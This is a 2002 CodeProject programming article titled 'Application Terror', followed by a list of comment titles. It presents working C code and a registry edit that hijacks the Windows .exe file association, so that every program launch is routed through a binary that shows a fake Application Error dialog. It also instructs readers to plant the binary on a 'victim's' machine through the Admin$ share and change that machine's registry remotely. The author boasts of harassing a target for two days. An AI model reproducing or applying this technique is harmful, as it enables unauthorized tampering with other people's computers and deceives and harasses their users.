Click here to Skip to main content
11,583,859 members (48,567 online)
Click here to Skip to main content

Application Terror

, 28 May 2002 Ms-PL 93.5K 298 34
Rate this:
Please Sign up or sign in to vote.
How to (really) annoy your friends and foes or even your boss.

Sample Image - Application_Terror.jpg

Being Bad

If you ever wanted to annoy someone really, here is a way to do it. Windows stores for .exe files a registry key which specifies what to do with a ".exe" file. It is located at HKEY_CLASSES_ROOT\exefile\shell\open\command and normally contains the value "%1" %* which just means: do what the first parameter specifies and pass the rest of the parameters as new parameters. As you may know, the first parameter is the full name of the .exe file to be executed.

And here we start with our nasty trick. We redirect the command line to our "application". We do this by modifying the registry key:

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"aelaunch.exe\" %1 %*"

You see already that our application is named AELAUNCH.EXE (you can give it any name) and takes some parameters.

The Bad One

Well, from now on, any application seems to generate an application error but still continues to run somehow.

The application is no miracle, it doesn't need nor use MFC. The whole code is just about 50 lines including comments. The main function is:

int APIENTRY _tWinMain(HINSTANCE hInst, 
   HINSTANCE,LPTSTR lpCmdLine, int nCmdShow)
{
    if (lpCmdLine[0] != '\0') // we have a command line?
    {
        LPSTR p = lpCmdLine;
        while(*p)
        {
            if(*p == '\"') // lets get rid of any quotes
                *p = ' ';
            p++;
        }
        // ::MessageBox(NULL, lpCmdLine, "Commandline", MB_OK);
        WinExec(lpCmdLine, nCmdShow);
    }

    DialogBox(hInst, (LPCTSTR)IDD_APPLICATIONTERROR_DIALOG, 
                                   NULL, (DLGPROC)DialogProc);
    
    return 0;
}

It uses the "obsolete" function WinExec() just because it's convenient and works perfectly. Using CreateProcess() or ShellExecute() would cause far too much trouble.

As you see, the application checks for a command line, replaces any existing quote characters with spaces (we really don't need them here anymore) and passes the command line to WinExec.

When WinExec returns (as soon as the starting application calls the first time, GetMessage()), the application shows a dialog which happen to look like the well known Application Error dialog. Smile | :)

Relax and Enjoy

Now you may wonder how this will annoy anyone? Remember a default share called Admin$? And do you remember that RegEdit can connect to other machines? Bingo, just copy the executable to your victim's Admin$\system32 directory, run RegEdit and modify the registry of the victim's machine. Here you go...

Try it and smile, while making a mental list of who will be the next target for aelaunch.exe.

The last one whom I targeted with it suffered 2 days until he found what I did. It was a well done payback.

License

This article, along with any associated source code and files, is licensed under The Microsoft Public License (Ms-PL)

Share

About the Author

No Biography provided

You may also be interested in...

Comments and Discussions

 
GeneralCompiling error.... Pin
Piccinano19-Feb-03 23:16
memberPiccinano19-Feb-03 23:16 
GeneralRe: Compiling error.... Pin
Andreas Saurwein19-Feb-03 23:30
memberAndreas Saurwein19-Feb-03 23:30 
GeneralIt can be useful! Pin
vboctor6-Nov-02 18:33
membervboctor6-Nov-02 18:33 
GeneralRe: It can be useful! Pin
Andreas Saurwein7-Nov-02 2:23
memberAndreas Saurwein7-Nov-02 2:23 
GeneralVirus Pin
Anonymous3-Jun-02 15:27
memberAnonymous3-Jun-02 15:27 
GeneralRe: Virus Pin
Philippe Lhoste4-Jun-02 3:27
memberPhilippe Lhoste4-Jun-02 3:27 
GeneralRe: Virus Pin
Andreas Saurwein4-Jun-02 3:37
memberAndreas Saurwein4-Jun-02 3:37 
GeneralRe: Virus (are you insane??) Pin
Panchote6-Mar-04 18:40
memberPanchote6-Mar-04 18:40 
GeneralHeh Pin
Matt Philmon29-May-02 16:49
memberMatt Philmon29-May-02 16:49 
GeneralRe: Heh Pin
Andreas Saurwein29-May-02 21:21
memberAndreas Saurwein29-May-02 21:21 
GeneralKewl! Pin
Shog929-May-02 15:09
memberShog929-May-02 15:09 
GeneralRe: Kewl! Pin
Nish - Native CPian29-May-02 15:23
memberNish - Native CPian29-May-02 15:23 
GeneralRe: Kewl! Pin
Andreas Saurwein29-May-02 21:24
memberAndreas Saurwein29-May-02 21:24 
GeneralAnother idea Pin
Nish - Native CPian29-May-02 15:14
memberNish - Native CPian29-May-02 15:14 
GeneralRe: Another idea Pin
Andreas Saurwein29-May-02 21:31
memberAndreas Saurwein29-May-02 21:31 
GeneralHey :-) Pin
Nish - Native CPian29-May-02 15:07
memberNish - Native CPian29-May-02 15:07 
GeneralRe: Hey :-) Pin
Shog929-May-02 15:19
memberShog929-May-02 15:19 
GeneralRe: Hey :-) Pin
Nish - Native CPian29-May-02 15:22
memberNish - Native CPian29-May-02 15:22 
GeneralRe: Hey :-) Pin
Shog929-May-02 15:29
memberShog929-May-02 15:29 
GeneralRe: Hey :-) Pin
Nish - Native CPian29-May-02 15:37
memberNish - Native CPian29-May-02 15:37 
GeneralRe: Hey :-) Pin
Shog929-May-02 15:40
memberShog929-May-02 15:40 
GeneralRe: Hey :-) Pin
peterchen30-May-02 1:08
memberpeterchen30-May-02 1:08 
GeneralRe: Hey :-) Pin
Ninja-the-Nerd14-Dec-06 14:58
memberNinja-the-Nerd14-Dec-06 14:58 
GeneralBad Pin
Thomas Freudenberg29-May-02 13:46
memberThomas Freudenberg29-May-02 13:46 
GeneralRe: Bad Pin
Andreas Saurwein29-May-02 21:19
memberAndreas Saurwein29-May-02 21:19 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.

| Advertise | Privacy | Terms of Use | Mobile
Web04 | 2.8.150603.1 | Last Updated 29 May 2002
Article Copyright 2002 by Andreas S. Franci Gonçalves
Everything else Copyright © CodeProject, 1999-2015
Layout: fixed | fluid